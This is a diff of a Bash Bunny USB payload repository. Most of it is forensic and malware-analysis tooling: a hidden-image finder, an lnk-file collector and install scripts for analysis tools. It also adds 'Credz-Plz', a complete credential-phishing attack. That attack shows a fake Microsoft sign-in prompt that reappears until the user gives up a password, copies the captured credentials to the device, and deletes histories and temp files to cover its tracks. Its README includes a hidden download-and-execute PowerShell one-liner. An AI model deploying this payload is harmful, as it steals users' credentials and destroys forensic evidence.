|
||||
$VolumeName = "bashbunny"
|
||||
$computerSystem = Get-CimInstance CIM_ComputerSystem
|
||||
$backupDrive = $null
|
||||
get-wmiobject win32_logicaldisk | % {
|
||||
if ($_.VolumeName -eq $VolumeName) {
|
||||
$backupDrive = $_.DeviceID
|
||||
}
|
||||
}
|
||||
|
||||
#See if a loot folder exist in usb. If not create one
|
||||
$TARGETDIR = $backupDrive + "\loot"
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
New-Item -ItemType directory -Path $TARGETDIR
|
||||
}
|
||||
|
||||
#See if a info folder exist in loot folder. If not create one
|
||||
$TARGETDIR = $backupDrive + "\loot\Hidden-Image-Files"
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
New-Item -ItemType directory -Path $TARGETDIR
|
||||
}
|
||||
|
||||
#Create a path that will be used to make the file
|
||||
$datetime = get-date -f yyyy-MM-dd_HH-mm
|
||||
$backupPath = $backupDrive + "\loot\Hidden-Image-Files\"
|
||||
|
||||
#Create output from info script
|
||||
$TARGETDIR = $MyInvocation.MyCommand.Path
|
||||
$TARGETDIR = $TARGETDIR -replace ".......$"
|
||||
cd $TARGETDIR
|
||||
|
||||
|
||||
$jpgheader = "255 216 255"
|
||||
$bmpheader = "66 77"
|
||||
$gifheader = "71 73 70"
|
||||
$tifheader = "73 73 42"
|
||||
$pngheader = "137 80 78 71 13 10 26 10"
|
||||
|
||||
$knownimageextensions = ("jpg", "jpeg", "bmp", "gif", "tif", "tiff", "png")
|
||||
|
||||
#walk the files in the user profile
|
||||
$files = Get-ChildItem $env:USERPROFILE -Recurse -ErrorAction silentlycontinue | select-object -Expand Fullname
|
||||
|
||||
|
||||
foreach ($file in $files)
|
||||
{
|
||||
|
||||
#get extension without . (dot)
|
||||
$extension = [System.IO.Path]::GetExtension($file).Replace(".", "")
|
||||
$extension = $extension.ToLower()
|
||||
|
||||
#Ignore known image extension
|
||||
if (!$knownimageextensions.contains($extension) -and (Get-Item $file).length -gt 0.1kb) {
|
||||
|
||||
#reset $fileheader
|
||||
$fileheader = "False"
|
||||
|
||||
#Grab header
|
||||
$2bytes = [string](Get-Content $file -Encoding Byte -ReadCount 1 -TotalCount 2 -EA ignore)
|
||||
$3bytes = [string](Get-Content $file -Encoding Byte -ReadCount 1 -TotalCount 3 -EA ignore)
|
||||
$8bytes = [string](Get-Content $file -Encoding Byte -ReadCount 1 -TotalCount 8 -EA ignore)
|
||||
|
||||
If ($8bytes -eq $pngheader) {$fileheader = "png"}
|
||||
Elseif ($3bytes -eq $jpgheader) {$fileheader = "jpg"}
|
||||
Elseif ($3bytes -eq $gifheader) {$fileheader = "gif"}
|
||||
Elseif ($3bytes -eq $tifheader) {$fileheader = "tif"}
|
||||
Elseif ($2bytes -eq $bmpheader) {$fileheader = "bmp"}
|
||||
|
||||
|
||||
if ($fileheader -ne "False") {
|
||||
[PSCustomObject]@{
|
||||
File = $file
|
||||
Header = $fileheader
|
||||
} | Export-Csv $backupPath\$datetime.csv -notype -Append
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,7 @@
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
LED SETUP
|
||||
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
|
||||
LED ATTACk
|
||||
@@ -0,0 +1,31 @@
|
||||
|
||||
Author : Paul Murton
|
||||
|
||||
Notes :
|
||||
|
||||
My background is in Computer Forensics and incident response.
|
||||
I am new to Powershell, so it's likely that the script is inefficient,
|
||||
but it does work.
|
||||
|
||||
In an incident where a user is suspected of exfiltrating data to a USB
|
||||
storage device, CD/DVD etc, its possible that the user may subsequently
|
||||
open an exfiltrated file on the media. In this scenario, a local lnk
|
||||
file will be created, providing evidence of the files existance.
|
||||
|
||||
This payload uses a powershell script to search the user profle for lnk
|
||||
files where the target is on a drive other than the C: Drive.
|
||||
|
||||
The output is put into a CSV file in the folder \loot\link-files
|
||||
|
||||
Tested on ver 1.3
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | ------------------------------------- |
|
||||
| Purple (blinking)| Attack in progress |
|
||||
| Green (blinking) | Attack Finished |
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,53 @@
|
||||
#Remove run history
|
||||
powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
||||
|
||||
#Get the path and file name that you are using for output
|
||||
# find connected bashbunny drive:
|
||||
$VolumeName = "bashbunny"
|
||||
$computerSystem = Get-CimInstance CIM_ComputerSystem
|
||||
$backupDrive = $null
|
||||
get-wmiobject win32_logicaldisk | % {
|
||||
if ($_.VolumeName -eq $VolumeName) {
|
||||
$backupDrive = $_.DeviceID
|
||||
}
|
||||
}
|
||||
|
||||
#See if a loot folder exist in usb. If not create one
|
||||
$TARGETDIR = $backupDrive + "\loot"
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
New-Item -ItemType directory -Path $TARGETDIR
|
||||
}
|
||||
|
||||
#See if a info folder exist in loot folder. If not create one
|
||||
$TARGETDIR = $backupDrive + "\loot\Link-Files"
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
New-Item -ItemType directory -Path $TARGETDIR
|
||||
}
|
||||
|
||||
#Create a path that will be used to make the file
|
||||
$datetime = get-date -f yyyy-MM-dd_HH-mm
|
||||
$backupPath = $backupDrive + "\loot\Link-Files\"
|
||||
|
||||
#Create output from info script
|
||||
$TARGETDIR = $MyInvocation.MyCommand.Path
|
||||
$TARGETDIR = $TARGETDIR -replace ".......$"
|
||||
cd $TARGETDIR
|
||||
|
||||
$files = Get-ChildItem $env:USERPROFILE -Recurse -Filter *.lnk | select-object -Expand Fullname
|
||||
|
||||
|
||||
foreach ($file in $files)
|
||||
{
|
||||
|
||||
$sh = New-Object -ComObject WScript.Shell
|
||||
$target = $sh.CreateShortcut($file).TargetPath
|
||||
$created = (Get-ItemProperty $file).CreationTime
|
||||
$written = (Get-ItemProperty $file).LastWriteTime
|
||||
|
||||
[PSCustomObject]@{
|
||||
Linkfile = $file
|
||||
Target = $target
|
||||
File_Created = $created
|
||||
Last_Written = $written
|
||||
} | Export-Csv $backupPath\link_files.csv -notype -Append
|
||||
}
|
||||
36
payloads/library/Incident_Response/MalwareBunny/README.md
Normal file
36
payloads/library/Incident_Response/MalwareBunny/README.md
Normal file
@@ -0,0 +1,36 @@
|
||||
# Malware Bunny
|
||||
## Overview
|
||||
This Bash Bunny module is used to install many tools used for reverse engineering and malware analysis.
|
||||
|
||||
|
||||
2 Operation Modes
|
||||
* Web UI for quick access to samples
|
||||
* SSH access for analysis sessions
|
||||
|
||||
|
||||
## Getting Started
|
||||
1. Get Bunny to access the Internet
|
||||
2. Install all tools and components
|
||||
* or - run setup.sh to install everything
|
||||
* or - manually install every tool from setup scripts
|
||||
3. Boot Bunny in Arming mode and upload payload files to switch1 and switch2
|
||||
4. Boot Bunny in switch1 mode to access web interface
|
||||
5. Boot Bunny in switch2 mode to access ssh interface
|
||||
|
||||
Web interface is meant long analysis sessions with minimal use, therefore CUCUMBER is enabled.
|
||||
|
||||
|
||||
## Software Installed
|
||||
1. viper v1.2
|
||||
2. ssdeep v2.14.1
|
||||
3. yara v3.7.0
|
||||
4. pyew
|
||||
6. featherduster
|
||||
7. capstone
|
||||
8. binwalk
|
||||
9. dshell
|
||||
10. wabt
|
||||
11. peepdf
|
||||
12. unzip
|
||||
13. punbup
|
||||
|
||||
@@ -0,0 +1,45 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: binwalk install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
apt-get install -y python-lzma python-crypto libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord zlib1g-dev liblzma-dev liblzo2-dev liblzo2-dev python-lzo
|
||||
pip install cstruct
|
||||
|
||||
cd /tools/
|
||||
git clone https://github.com/ReFirmLabs/binwalk
|
||||
cd binwalk
|
||||
|
||||
|
||||
git clone https://github.com/devttys0/sasquatch
|
||||
cd sasquatch/
|
||||
ls
|
||||
# edit build file to fix lack of sudo error on make install
|
||||
# vi build.sh
|
||||
./build.sh
|
||||
|
||||
cd ..
|
||||
git clone https://github.com/sviehb/jefferson
|
||||
cd jefferson
|
||||
python setup.py install
|
||||
|
||||
cd ..
|
||||
git clone https://github.com/jrspruitt/ubi_reader
|
||||
cd ubi_reader
|
||||
python setup.py install
|
||||
|
||||
cd ..
|
||||
git clone https://github.com/devttys0/yaffshiv
|
||||
cd yaffshiv
|
||||
python setup.py install
|
||||
|
||||
cd ..
|
||||
wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv
|
||||
cp bin/unstuff /usr/local/bin/
|
||||
|
||||
python setup.py install
|
||||
@@ -0,0 +1,21 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: capstone install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
cd /tmp/
|
||||
wget https://github.com/aquynh/capstone/archive/3.0.5-rc2.tar.gz
|
||||
tar xf 3.0.5-rc2.tar.gz
|
||||
rm 3.0.5-rc2.tar.gz
|
||||
mv capstone-3.0.5-rc2/ /tools/capstone
|
||||
|
||||
cd /tools/capstone
|
||||
make
|
||||
make install
|
||||
|
||||
cd bindings/python
|
||||
make install
|
||||
@@ -0,0 +1,29 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: dshell install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
apt-get install -y python-dpkt python-ipy python-pypcap
|
||||
pip install pygeoip
|
||||
|
||||
cd /tools/
|
||||
git clone https://github.com/USArmyResearchLab/Dshell dshell
|
||||
cd dshell
|
||||
|
||||
cd share/GeoIP/
|
||||
wget http://geolite.macxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
|
||||
gunzip -d GeoIP.dat.gz
|
||||
wget http://geolite.maxmind.com/download/geoip/database/GeoIPv6.dat.gz
|
||||
gunzip -d GeoIPv6.dat.gz
|
||||
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum.dat.gz
|
||||
gunzip -d GeoIPASNum.dat.gz
|
||||
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNumv6.dat.gz
|
||||
gunzip -d GeoIPASNumv6.dat.gz
|
||||
cd ../../
|
||||
|
||||
make
|
||||
@@ -0,0 +1,17 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: featherduster install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
apt-get install -y libgmp3-dev
|
||||
apt-get install -y libncurses-dev
|
||||
|
||||
cd /tools
|
||||
git clone https://github.com/nccgroup/featherduster
|
||||
cd featherduster
|
||||
|
||||
python setup.py install
|
||||
@@ -0,0 +1,33 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: peepdf install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
apt-get install -y unzip python-libemu
|
||||
|
||||
cd /tmp/
|
||||
wget http://eternal-todo.com/files/pdf/peepdf/peepdf_0.3.zip
|
||||
unzip peepdf_0.3.zip
|
||||
mv peepdf_0.3 /tools/peepdf
|
||||
cd /tools/peepdf
|
||||
|
||||
#mkdir dpt
|
||||
#cd dpt
|
||||
#wget https://storage.googleapis.com/chrome-infra/depot_tools.zip
|
||||
#unzip depot_tools.zip
|
||||
#cd ..
|
||||
#mv dpt /tools/depot_tools
|
||||
#echo 'export PATH=$PATH:$HOME/../tools/depot_tools' >> ~/.bashrc
|
||||
#gclient
|
||||
#mkdir /tools/v8
|
||||
#cd /tools/v8
|
||||
#fetch v8
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,15 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: punbup install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
cd /tools
|
||||
git clone https://github.com/herrcore/punbup
|
||||
cd punbup
|
||||
python setup.py install
|
||||
|
||||
@@ -0,0 +1,30 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: main install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
# Install System Dependencies
|
||||
apt-get install -y automake libtool make gcc flex bison libmagic-dev libssl-dev python-dev swig libfuzzy-dev exiftool
|
||||
|
||||
# Install Python Dependencies
|
||||
pip install SQLAlchemy PrettyTable python-magic
|
||||
|
||||
# Other Tools
|
||||
apt-get -y install python-scapy pyew unzip
|
||||
|
||||
# Setup Custom Tools
|
||||
./ssdeep.sh
|
||||
./yara.sh
|
||||
./viper.sh
|
||||
./dshell.sh
|
||||
./capstone.sh
|
||||
./binwalk.sh
|
||||
./featherduster.sh
|
||||
./wabt.sh
|
||||
./peepdf.sh
|
||||
|
||||
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: ssdeep install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
cd /tmp
|
||||
|
||||
wget https://github.com/ssdeep-project/ssdeep/archive/release-2.14.1.tar.gz
|
||||
tar xf release-2.14.1.tar.gz
|
||||
rm release-2.14.1.tar.gz
|
||||
mv ssdeep-release-2.14.1/ /tools/ssdeep
|
||||
cd /tools/ssdeep
|
||||
|
||||
./bootstrap
|
||||
./configure
|
||||
make
|
||||
make install
|
||||
|
||||
pip install pydeep
|
||||
@@ -0,0 +1,17 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: viper install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
cd /tmp
|
||||
wget https://github.com/viper-framework/viper/archive/v1.2.tar.gz
|
||||
tar xf v1.2.tar.gz
|
||||
rm v1.2.tar.gz
|
||||
mv viper-1.2/ /tools/viper
|
||||
|
||||
cd /tools/viper
|
||||
pip install -r requirements.txt
|
||||
@@ -0,0 +1,15 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: web assembly binary toolkit install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
apt-get install cmake clang
|
||||
|
||||
cd /tools/
|
||||
git clone --recursive https://github.com/WebAssembly/wabt
|
||||
cd wabt
|
||||
make
|
||||
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: yara install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
cd /tmp
|
||||
wget https://github.com/VirusTotal/yara/archive/v3.7.0.tar.gz
|
||||
tar xf v3.7.0.tar.gz
|
||||
rm v3.7.0.tar.gz
|
||||
mv yara-3.7.0/ /tools/yara
|
||||
|
||||
cd /tools/yara
|
||||
./bootstrap.sh
|
||||
./configure --enable-magic --enable-dotnet
|
||||
make
|
||||
make install
|
||||
|
||||
pip install yara-python
|
||||
@@ -0,0 +1,24 @@
|
||||
#!/bin/bash
|
||||
# Title: MalwareBunny
|
||||
# Description: Malware Analysis on Bash Bunny
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
#
|
||||
# LED State Descriptions
|
||||
# Magenta Blinking - setup in progress
|
||||
# Blue Blinking - ready to use
|
||||
|
||||
LED M SLOW
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
sleep 3
|
||||
|
||||
cd /tools/viper/
|
||||
python web.py -H 0.0.0.0 -p 8080 &
|
||||
|
||||
CUCUMBER ENABLE
|
||||
sleep 3
|
||||
|
||||
LED B SLOW
|
||||
@@ -0,0 +1,18 @@
|
||||
#!/bin/bash
|
||||
# Title: MalwareBunny
|
||||
# Description: Malware Analysis on Bash Bunny
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
#
|
||||
# LED State Descriptions
|
||||
# Magenta Blinking - setup in progress
|
||||
# Blue Blinking - ready to use
|
||||
|
||||
LED M SLOW
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
sleep 5
|
||||
|
||||
LED B SLOW
|
||||
178
payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1
Normal file
178
payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1
Normal file
@@ -0,0 +1,178 @@
|
||||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
|
||||
|
||||
.DESCRIPTION
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your Bash Bunny
|
||||
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Creating loot folder
|
||||
|
||||
# Get Drive Letter
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
|
||||
|
||||
# Test if directory exists if not create directory in loot folder to store file
|
||||
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
|
||||
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
mkdir $TARGETDIR
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to generate the ui.prompt you will use to harvest their credentials
|
||||
#>
|
||||
|
||||
function Get-Creds {
|
||||
do{
|
||||
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
|
||||
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
|
||||
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
|
||||
Get-Creds
|
||||
}
|
||||
$creds = $cred.GetNetworkCredential() | fl
|
||||
return $creds
|
||||
# ...
|
||||
|
||||
$done = $true
|
||||
} until ($done)
|
||||
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to pause the script until a mouse movement is detected
|
||||
#>
|
||||
|
||||
function Pause-Script{
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
|
||||
#>
|
||||
|
||||
function Caps-Off {
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
|
||||
|
||||
#If true, toggle CapsLock key, to ensure that the script doesn't fail
|
||||
if ($caps -eq $true){
|
||||
|
||||
$key = New-Object -ComObject WScript.Shell
|
||||
$key.SendKeys('{CapsLock}')
|
||||
}
|
||||
}
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
|
||||
#>
|
||||
|
||||
Pause-Script
|
||||
|
||||
Caps-Off
|
||||
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
|
||||
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
|
||||
|
||||
$creds = Get-Creds
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to save the gathered credentials to a file in the temp directory
|
||||
#>
|
||||
|
||||
echo $creds >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This exfiltrates your loot to the Bash Bunny
|
||||
#>
|
||||
|
||||
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
||||
102
payloads/library/credentials/-BB-Credz-Plz/README.md
Normal file
102
payloads/library/credentials/-BB-Credz-Plz/README.md
Normal file
@@ -0,0 +1,102 @@
|
||||

|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Credz-Plz
|
||||
|
||||
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
|
||||
|
||||
## Description
|
||||
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your dropbox for collection
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
22
payloads/library/credentials/-BB-Credz-Plz/payload.txt
Normal file
22
payloads/library/credentials/-BB-Credz-Plz/payload.txt
Normal file
@@ -0,0 +1,22 @@
|
||||
# Title: Credz-Plz
|
||||
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Recon
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
|
||||
QUACK ENTER
|
||||
BIN
payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg
Normal file
BIN
payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 73 KiB |
BIN
payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg
Normal file
BIN
payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 39 KiB |
@@ -1,77 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: BrowserCreds
|
||||
# Author: illwill
|
||||
# Version: 0.1
|
||||
#
|
||||
